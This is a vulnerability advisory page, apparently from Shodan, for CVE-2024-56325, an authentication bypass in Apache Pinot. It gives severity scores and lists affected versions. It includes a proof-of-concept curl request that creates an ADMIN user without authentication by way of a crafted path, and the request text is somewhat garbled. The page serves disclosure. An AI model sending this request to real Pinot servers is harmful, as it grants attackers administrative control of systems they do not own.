Vulnerabilities
Vulnerable Software

Vulnerability Details CVE-2024-56325

Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
Exploit prediction scoring system (EPSS) score
EPSS Score 0.017
EPSS Ranking 81.6%
CVSS Severity
CVSS v3 Score 9.8
Products affected by CVE-2024-56325
  • Apache » Pinot » Version: 0.1.0
    cpe:2.3:a:apache:pinot:0.1.0
  • Apache » Pinot » Version: 0.10.0
    cpe:2.3:a:apache:pinot:0.10.0
  • Apache » Pinot » Version: 0.11.0
    cpe:2.3:a:apache:pinot:0.11.0
  • Apache » Pinot » Version: 0.12.0
    cpe:2.3:a:apache:pinot:0.12.0
  • Apache » Pinot » Version: 0.12.1
    cpe:2.3:a:apache:pinot:0.12.1
  • Apache » Pinot » Version: 0.2.0
    cpe:2.3:a:apache:pinot:0.2.0
  • Apache » Pinot » Version: 0.3.0
    cpe:2.3:a:apache:pinot:0.3.0
  • Apache » Pinot » Version: 0.4.0
    cpe:2.3:a:apache:pinot:0.4.0
  • Apache » Pinot » Version: 0.5.0
    cpe:2.3:a:apache:pinot:0.5.0
  • Apache » Pinot » Version: 0.6.0
    cpe:2.3:a:apache:pinot:0.6.0
  • Apache » Pinot » Version: 0.7.1
    cpe:2.3:a:apache:pinot:0.7.1
  • Apache » Pinot » Version: 0.8.0
    cpe:2.3:a:apache:pinot:0.8.0
  • Apache » Pinot » Version: 0.9.0
    cpe:2.3:a:apache:pinot:0.9.0
  • Apache » Pinot » Version: 0.9.1
    cpe:2.3:a:apache:pinot:0.9.1
  • Apache » Pinot » Version: 0.9.2
    cpe:2.3:a:apache:pinot:0.9.2
  • Apache » Pinot » Version: 0.9.3
    cpe:2.3:a:apache:pinot:0.9.3
  • Apache » Pinot » Version: 1.0.0
    cpe:2.3:a:apache:pinot:1.0.0
  • Apache » Pinot » Version: 1.1.0
    cpe:2.3:a:apache:pinot:1.1.0
  • Apache » Pinot » Version: 1.2.0
    cpe:2.3:a:apache:pinot:1.2.0


Contact Us

Shodan ® - All rights reserved